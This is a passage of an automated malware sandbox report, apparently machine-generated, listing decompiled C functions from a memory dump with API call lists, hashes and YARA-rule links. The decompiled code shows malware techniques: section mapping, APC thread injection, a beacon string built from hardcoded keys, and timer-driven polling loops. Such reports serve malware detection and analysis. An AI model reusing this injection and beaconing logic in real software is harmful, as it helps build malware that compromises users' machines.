				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E004011EA(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401e60
0x00401e67
0x00401e68
0x00401e69
0x00401e6a
0x00401e6b
0x00401e7c
0x00401e80
0x00401e94
0x00401e97
0x00401e9a
0x00401ea1
0x00401ea4
0x00401eab
0x00401eae
0x00401eb1
0x00401eb4
0x00401eb9
0x00401ef4
0x00401ebb
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ecd
0x00401eeb
0x00401ecf
0x00401ed6
0x00401ee4
0x00401ee4
0x00401ecd
0x00401efc

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000), ref: 00401EB4

Part of subcall function 004011EA: NtMapViewOfSection.NTDLL(00000000,000000FF,00401EC9,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,00401EC9,?), ref: 00401217

memset.NTDLL ref: 00401ED6

Strings

@, xrefs: 00401EA4

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 7fc120d833c92780bbefd71088f43d077229a2744204003f70b99ebadbfa48a0
Instruction ID: 41ba07cc2578aae68053693b572dfa012fbabd9f600f7a431e477c766e8d90cf
Opcode Fuzzy Hash: 7fc120d833c92780bbefd71088f43d077229a2744204003f70b99ebadbfa48a0
Instruction Fuzzy Hash: E821F9B2D00209AFCB11DFA9C8849EFFBB9EF48354F10447AE605F7250D6349A459BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004011EA, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004011EA(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x004011fc
0x00401202
0x00401210
0x00401217
0x0040121c
0x00401222
0x00000000
0x00401223
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,00401EC9,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,00401EC9,?), ref: 00401217

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 11f0429dd7ca72973dd5b145f597fb567fe0d5e84d0abfb33d61b83f20268b87
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: DBF012B690020CFFDB119FA5DC85CAFBBBDEB44394B104D7AF552E10A0D6319E089A60

Uniqueness

Uniqueness Score: -1.00%

Function 044B1000, Relevance: 27.2, APIs: 18, Instructions: 212
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E044B1000(long __eax, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				int _t54;
				void* _t55;
				intOrPtr _t56;
				void* _t61;
				void* _t64;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr* _t74;
				intOrPtr _t80;
				void* _t82;
				intOrPtr _t89;
				signed int _t93;
				char** _t95;
				int _t97;
				signed int _t99;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				void* _t110;
				int* _t111;
				void* _t119;
				intOrPtr _t122;
				void* _t124;
				long _t127;
				intOrPtr* _t128;
				intOrPtr* _t129;
				intOrPtr* _t132;

				_t119 = __edx;
				_t47 = __eax;
				_v8 = 8;
				if(__eax == 0) {
					_t47 = GetTickCount();
				}
				_t48 =  *0x44bd018; // 0x4b16c72e
				asm("bswap eax");
				_t49 =  *0x44bd014; // 0x3a87c8cd
				asm("bswap eax");
				_t50 =  *0x44bd010; // 0xd8d2f808
				asm("bswap eax");
				_t51 =  *0x44bd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t52 =  *0x44bd2a4; // 0x8ca5a8
				_t2 = _t52 + 0x44be633; // 0x74666f73
				_t54 = wsprintfA(_a16, _t2, 3, 0x3d132, _t51, _t50, _t49, _t48,  *0x44bd02c,  *0x44bd004, _t47);
				_t55 = E044B8616();
				_t56 =  *0x44bd2a4; // 0x8ca5a8
				_t4 = _t56 + 0x44be673; // 0x74707526
				wsprintfA(_a16 + _t54, _t4, _t55);
				_t122 =  *0x44bd324; // 0x4d895b0
				_t61 = E044B66DB(0x44bd00a, _t122 + 4);
				_t127 = 0;
				_v20 = _t61;
				if(_t61 == 0) {
					L22:
					RtlFreeHeap( *0x44bd238, _t127, _a16); // executed
					return _v8;
				}
				_t64 = RtlAllocateHeap( *0x44bd238, 0, 0x800);
				_v16 = _t64;
				if(_t64 == 0) {
					L21:
					HeapFree( *0x44bd238, _t127, _v20);
					goto L22;
				}
				E044B59B0(GetTickCount());
				_t68 =  *0x44bd324; // 0x4d895b0
				__imp__(_t68 + 0x40);
				asm("lock xadd [eax], ecx");
				_t72 =  *0x44bd324; // 0x4d895b0
				__imp__(_t72 + 0x40);
				_t74 =  *0x44bd324; // 0x4d895b0
				_t124 = E044B69CF(1, _t119, _a16,  *_t74);
				_v28 = _t124;
				asm("lock xadd [eax], ecx");
				if(_t124 == 0) {
					L20:
					HeapFree( *0x44bd238, _t127, _v16);
					goto L21;
				}
				StrTrimA(_t124, 0x44bc294);
				_t80 =  *0x44bd2a4; // 0x8ca5a8
				_push(_t124);
				_t10 = _t80 + 0x44be252; // 0x616d692f
				_t82 = E044B5FD1(_t10);
				_v12 = _t82;
				if(_t82 == 0) {
					L19:
					HeapFree( *0x44bd238, _t127, _t124);
					goto L20;
				}
				_t128 = __imp__;
				 *_t128(_t124, _a4);
				_t110 = _v16;
				 *_t128(_t110, _v20);
				_t129 = __imp__;
				 *_t129(_t110, _v12);
				 *_t129(_t110, _t124);
				_t89 = E044BA5A3(0, _t110);
				_a4 = _t89;
				if(_t89 == 0) {
					_v8 = 8;
					L17:
					E044B5225();
					L18:
					HeapFree( *0x44bd238, 0, _v12);
					_t127 = 0;
					goto L19;
				}
				_t93 = E044B1297(_t110, 0xffffffffffffffff, _t124,  &_v24); // executed
				_t111 = _a12;
				_v8 = _t93;
				if(_t93 == 0) {
					_t132 = _v24;
					_t99 = E044B3DCD(_t132, _a4, _a8, _t111); // executed
					_v8 = _t99;
					_t100 =  *((intOrPtr*)(_t132 + 8));
					 *((intOrPtr*)( *_t100 + 0x80))(_t100);
					_t102 =  *((intOrPtr*)(_t132 + 8));
					 *((intOrPtr*)( *_t102 + 8))(_t102);
					_t104 =  *((intOrPtr*)(_t132 + 4));
					 *((intOrPtr*)( *_t104 + 8))(_t104);
					_t106 =  *_t132;
					 *((intOrPtr*)( *_t106 + 8))(_t106);
					E044B45B3(_t132);
				}
				if(_v8 != 0x10d2) {
					L12:
					if(_v8 == 0) {
						_t95 = _a8;
						if(_t95 != 0) {
							_t130 =  *_t111;
							_t125 =  *_t95;
							wcstombs( *_t95,  *_t95,  *_t111);
							_t97 = E044B4725(_t125, _t125, _t130 >> 1);
							_t124 = _v28;
							 *_t111 = _t97;
						}
					}
					goto L15;
				} else {
					if(_a8 != 0) {
						L15:
						E044B45B3(_a4);
						if(_v8 == 0 || _v8 == 0x10d2) {
							goto L18;
						} else {
							goto L17;
						}
					}
					_v8 = _v8 & 0x00000000;
					goto L12;
				}
			}

0x044b1000
0x044b1000
0x044b100f
0x044b1018
0x044b101a
0x044b101a
0x044b1023
0x044b102e
0x044b1031
0x044b103c
0x044b103f
0x044b1044
0x044b1047
0x044b104c
0x044b104f
0x044b105b
0x044b1065
0x044b106c
0x044b1072
0x044b1077
0x044b1084
0x044b1086
0x044b1097
0x044b109c
0x044b109e
0x044b10a3
0x044b1274
0x044b127e
0x044b128b
0x044b128b
0x044b10b5
0x044b10bb
0x044b10c0
0x044b1264
0x044b126e
0x00000000
0x044b126e
0x044b10c8
0x044b10cd
0x044b10d6
0x044b10e7
0x044b10eb
0x044b10f4
0x044b10fa
0x044b1109
0x044b1110
0x044b1119
0x044b111f
0x044b1254
0x044b125e
0x00000000
0x044b125e
0x044b112b
0x044b1131
0x044b1136
0x044b1137
0x044b113e
0x044b1143
0x044b1148
0x044b1246
0x044b124e
0x00000000
0x044b124e
0x044b1151
0x044b1158
0x044b115d
0x044b1161
0x044b1166
0x044b116d
0x044b1171
0x044b1176
0x044b117b
0x044b1180
0x044b128e
0x044b122e
0x044b122e
0x044b1233
0x044b123e
0x044b1244
0x00000000
0x044b1244
0x044b118a
0x044b118f
0x044b1192
0x044b1197
0x044b1199
0x044b11a5
0x044b11aa
0x044b11ad
0x044b11b3
0x044b11b9
0x044b11bf
0x044b11c2
0x044b11c8
0x044b11cb
0x044b11d0
0x044b11d4
0x044b11d4
0x044b11e0
0x044b11ec
0x044b11f0
0x044b11f2
0x044b11f7
0x044b11f9
0x044b11fb
0x044b1200
0x044b120d
0x044b1212
0x044b1215
0x044b1215
0x044b11f7
0x00000000
0x044b11e2
0x044b11e6
0x044b1217
0x044b121a
0x044b1223
0x00000000
0x00000000
0x00000000
0x00000000
0x044b1223
0x044b11e8
0x00000000
0x044b11e8

APIs

GetTickCount.KERNEL32 ref: 044B101A
wsprintfA.USER32 ref: 044B1065
wsprintfA.USER32 ref: 044B1084
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 044B10B5
GetTickCount.KERNEL32 ref: 044B10C6
RtlEnterCriticalSection.NTDLL(04D89570), ref: 044B10D6
RtlLeaveCriticalSection.NTDLL(04D89570), ref: 044B10F4
StrTrimA.SHLWAPI(00000000,044BC294,?,04D895B0), ref: 044B112B
lstrcpy.KERNEL32(00000000,?), ref: 044B1158
lstrcpy.KERNEL32(?,?), ref: 044B1161
lstrcat.KERNEL32(?,?), ref: 044B116D
lstrcat.KERNEL32(?,00000000), ref: 044B1171

Part of subcall function 044BA5A3: lstrlen.KERNEL32(?,00000000,044BD330,00000001,044B453C,044BD00C,044BD00C,00000000,00000005,00000000,00000000,?,?,?,044B857A,?), ref: 044BA5AC
Part of subcall function 044BA5A3: mbstowcs.NTDLL ref: 044BA5D3
Part of subcall function 044BA5A3: memset.NTDLL ref: 044BA5E5

wcstombs.NTDLL ref: 044B1200

Part of subcall function 044B3DCD: SysAllocString.OLEAUT32(?), ref: 044B3E08
Part of subcall function 044B3DCD: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 044B3E8B

Part of subcall function 044B45B3: HeapFree.KERNEL32(00000000,00000000,044B5DE9,00000000,?,?,-00000008), ref: 044B45BF

HeapFree.KERNEL32(00000000,?,?), ref: 044B123E
HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 044B124E
HeapFree.KERNEL32(00000000,?,?,04D895B0), ref: 044B125E
HeapFree.KERNEL32(00000000,?), ref: 044B126E
RtlFreeHeap.NTDLL(00000000,?), ref: 044B127E

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$CountCriticalSectionTicklstrcatlstrcpywsprintf$AllocAllocateEnterInterface_LeaveProxyQueryStringTrimUnknown_lstrlenmbstowcsmemsetwcstombs
String ID:
API String ID: 4121355665-0
Opcode ID: 7c5988bd6617eb52eed57bec9c51beb256e5e4af780b2e116920cff13d0ef533
Instruction ID: 449806431a719246c7d3bbe3c838464b3d4b1e0965135c64951b552cfd55bb3d
Opcode Fuzzy Hash: 7c5988bd6617eb52eed57bec9c51beb256e5e4af780b2e116920cff13d0ef533
Instruction Fuzzy Hash: C8716CB1900204EFEF15DFA5DC88A9ABBB8EF48354B104459F549E7251C738ED51DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00401F17, Relevance: 22.6, APIs: 15, Instructions: 112
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401F17(void* __ecx, void* __edx, void* __edi, long _a4) {
				long _v8;
				void* _v32;
				long _t21;
				long _t23;
				long _t25;
				void* _t26;
				long _t29;
				long _t30;
				long _t34;
				void* _t39;
				intOrPtr _t42;
				void* _t47;
				void* _t52;
				signed int _t55;
				void* _t57;
				intOrPtr* _t58;

				_t47 = __ecx;
				_t21 = E004010D8();
				_v8 = _t21;
				if(_t21 != 0) {
					return _t21;
				}
				do {
					_t55 = SwitchToThread() + 8;
					_t23 = E00401B04(__edi, _t55); // executed
					_v8 = _t23;
					Sleep(0x20 + _t55 * 4); // executed
					_t25 = _v8;
				} while (_t25 == 0xc);
				if(_t25 != 0) {
					L21:
					return _t25;
				}
				_push(__edi);
				if(_a4 != 0) {
					L11:
					_t26 = CreateThread(0, 0, __imp__SleepEx,  *0x404140, 0, 0); // executed
					_t57 = _t26;
					if(_t57 == 0) {
						L18:
						_v8 = GetLastError();
						L19:
						_t25 = _v8;
						if(_t25 == 0xffffffff) {
							_t25 = GetLastError();
						}
						goto L21;
					}
					_t29 = QueueUserAPC(E00401280, _t57,  &_v32); // executed
					if(_t29 == 0) {
						_t34 = GetLastError();
						_a4 = _t34;
						TerminateThread(_t57, _t34);
						CloseHandle(_t57);
						_t57 = 0;
						SetLastError(_a4);
					}
					if(_t57 == 0) {
						goto L18;
					} else {
						_t30 = WaitForSingleObject(_t57, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t57,  &_v8);
						}
						CloseHandle(_t57);
						goto L19;
					}
				}
				if(E004018FC(_t47,  &_a4) != 0) {
					 *0x404138 = 0;
					goto L11;
				}
				_t58 = __imp__GetLongPathNameW;
				_t39 =  *_t58(_a4, 0, 0); // executed
				_t52 = _t39;
				if(_t52 == 0) {
					L9:
					 *0x404138 = _a4;
					goto L11;
				}
				_t10 = _t52 + 2; // 0x2
				_t42 = E0040163D(_t52 + _t10);
				 *0x404138 = _t42;
				if(_t42 == 0) {
					goto L9;
				}
				 *_t58(_a4, _t42, _t52); // executed
				E00401628(_a4);
				goto L11;
			}

0x00401f17
0x00401f1e
0x00401f25
0x00401f2a
0x0040204b
0x0040204b
0x00401f31
0x00401f39
0x00401f3d
0x00401f42
0x00401f4d
0x00401f53
0x00401f56
0x00401f5d
0x00402048
0x00000000
0x00402048
0x00401f63
0x00401f67
0x00401fbd
0x00401fcd
0x00401fd3
0x00401fdd
0x00402038
0x0040203a
0x0040203d
0x0040203d
0x00402044
0x00402046
0x00402046
0x00000000
0x00402044
0x00401fe9
0x00401ff7
0x00401ff9
0x00401ffd
0x00402000
0x00402007
0x0040200c
0x0040200e
0x0040200e
0x00402016
0x00000000
0x00402018
0x0040201b
0x00402021
0x00402026
0x0040202d
0x0040202d
0x00402034
0x00000000
0x00402034
0x00402016
0x00401f74
0x00401fb7
0x00000000
0x00401fb7
0x00401f76
0x00401f81
0x00401f83
0x00401f87
0x00401fad
0x00401fb0
0x00000000
0x00401fb0
0x00401f89
0x00401f8e
0x00401f93
0x00401f9a
0x00000000
0x00000000
0x00401fa1
0x00401fa6
0x00000000

APIs

Part of subcall function 004010D8: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00401F23), ref: 004010E7
Part of subcall function 004010D8: GetVersion.KERNEL32(?,00401F23), ref: 004010F6
Part of subcall function 004010D8: GetCurrentProcessId.KERNEL32(?,00401F23), ref: 00401112
Part of subcall function 004010D8: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00401F23), ref: 0040112B

SwitchToThread.KERNEL32 ref: 00401F31

Part of subcall function 00401B04: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00401B5A
Part of subcall function 00401B04: memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,00401F42,-00000008), ref: 00401BEC
Part of subcall function 00401B04: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00401C07

Sleep.KERNELBASE(00000000,-00000008), ref: 00401F4D
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401F81
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401FA1
CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 00401FCD
QueueUserAPC.KERNELBASE(00401280,00000000,?), ref: 00401FE9
GetLastError.KERNEL32 ref: 00401FF9
TerminateThread.KERNEL32(00000000,00000000), ref: 00402000
CloseHandle.KERNEL32(00000000), ref: 00402007
SetLastError.KERNEL32(?), ref: 0040200E
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040201B
GetExitCodeThread.KERNEL32(00000000,?), ref: 0040202D
CloseHandle.KERNEL32(00000000), ref: 00402034
GetLastError.KERNEL32 ref: 00402038
GetLastError.KERNEL32 ref: 00402046

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
String ID:
API String ID: 3896949738-0
Opcode ID: 0c97eee5f9de26d266884c74d3ab1237038c97dddecda00afc4d9c61fa7299fd
Instruction ID: 2fd5af0a1274434b7779ccdcb11ef6da011c995e5ce2883dc13ddb8af7a42aa9
Opcode Fuzzy Hash: 0c97eee5f9de26d266884c74d3ab1237038c97dddecda00afc4d9c61fa7299fd
Instruction Fuzzy Hash: 633173B1801219BFCB11AFA4DD88C9F7BACEB483557104536FA01F32A0D7388E45DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 044B6130, Relevance: 16.7, APIs: 11, Instructions: 152
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E044B6130(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x44bd240);
					_v76 = 0;
					_v80 = 0;
					L044BAE98();
					_v84.LowPart = _t46;
					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x44bd26c; // 0x318
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x44bd24c = 5;
						} else {
							_t68 = E044B6A7F(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x44bd260 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E044B5B7A(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_v104.LowPart = _t65;
						_t97 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v120 = E044B8155(_t74, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x44bd244);
							goto L21;
						} else {
							__eflags =  *0x44bd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E044B5225();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x44bd248);
								L21:
								L044BAE98();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x44bd238, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

0x044b6130
0x044b6146
0x044b614a
0x044b614f
0x044b6156
0x044b615c
0x044b6162
0x044b62ea
0x044b6168
0x044b6168
0x044b616a
0x044b616f
0x044b6170
0x044b6176
0x044b617a
0x044b617e
0x044b618c
0x044b619a
0x044b619e
0x044b61a0
0x044b61ad
0x044b61b9
0x044b61bb
0x044b61c1
0x044b61ca
0x044b61d5
0x044b61d5
0x044b61cc
0x044b61cc
0x044b61d3
0x00000000
0x00000000
0x044b61d3
0x044b61df
0x00000000
0x044b61e3
0x044b61e8
0x044b61f3
0x044b61f3
0x044b61fb
0x044b6206
0x044b620e
0x044b6217
0x044b621a
0x044b621e
0x044b6223
0x044b6229
0x00000000
0x00000000
0x044b622b
0x044b622f
0x044b6233
0x044b6236
0x00000000
0x044b6238
0x044b6248
0x044b6248
0x00000000
0x044b6279
0x044b6279
0x044b627e
0x044b629d
0x044b629f
0x044b62a4
0x044b62a5
0x00000000
0x044b6280
0x044b6280
0x044b6286
0x00000000
0x044b6288
0x044b6288
0x044b628d
0x044b628f
0x044b6294
0x044b6295
0x044b62ab
0x044b62ab
0x044b62b3
0x044b62c1
0x044b62c5
0x044b62d1
0x044b62d3
0x044b62d7
0x044b62d9
0x00000000
0x044b62df
0x00000000
0x044b62df
0x044b62d9
0x044b6286
0x00000000
0x044b627e
0x044b624c
0x044b624e
0x044b6252
0x044b6253
0x044b6253
0x044b6257
0x044b6261
0x044b6261
0x044b6267
0x044b626a
0x044b626a
0x044b6271
0x044b6271
0x044b62f8
0x00000000

APIs

memset.NTDLL ref: 044B614A
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 044B6156
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 044B617E
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 044B619E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,044B2051,?), ref: 044B61B9
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,044B2051,?,00000000), ref: 044B6261
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,044B2051,?,00000000,?,?), ref: 044B6271
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 044B62AB
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 044B62C5
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 044B62D1

Part of subcall function 044B6A7F: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04D89358,00000000,?,7519F710,00000000,7519F730), ref: 044B6ACE
Part of subcall function 044B6A7F: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04D89390,?,00000000,30314549,00000014,004F0053,04D8934C), ref: 044B6B6B
Part of subcall function 044B6A7F: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,044B61D1), ref: 044B6B7D

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,044B2051,?,00000000,?,?), ref: 044B62E4

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 44d693ba7dfc4f3f3cc971bdb5a00a89faa0cf3fa979b60e50975608c72a28ec
Instruction ID: d1f86a8cc131751b9f456a64b5c697413e48e086851abce4641907182122a77c
Opcode Fuzzy Hash: 44d693ba7dfc4f3f3cc971bdb5a00a89faa0cf3fa979b60e50975608c72a28ec
Instruction Fuzzy Hash: 4A513CB1509310AFEB14AF55DC849ABFBE8EF85724F108A1EF99492250D774E904CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 044B8492, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E044B8492(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L044BAE92();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x44bd2a4; // 0x8ca5a8
				_t5 = _t13 + 0x44be836; // 0x4d88dde
				_t6 = _t13 + 0x44be59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L044BAB2A();
				_t17 = CreateFileMappingW(0xffffffff, 0x44bd2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x044b8492
0x044b849a
0x044b849e
0x044b84a4
0x044b84a9
0x044b84ae
0x044b84b1
0x044b84b4
0x044b84b9
0x044b84ba
0x044b84bd
0x044b84c2
0x044b84c9
0x044b84d3
0x044b84d5
0x044b84d6
0x044b84d9
0x044b84f5
0x044b84fb
0x044b84ff
0x044b854d
0x044b8501
0x044b850e
0x044b851e
0x044b8526
0x044b8538
0x044b853c
0x00000000
0x00000000
0x044b8528
0x044b852b
0x044b8530
0x044b8532
0x044b8532
0x044b8510
0x044b8512
0x044b853e
0x044b853f
0x044b853f
0x044b850e
0x044b8554

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,044B1F23,?,?,4D283A53,?,?), ref: 044B849E
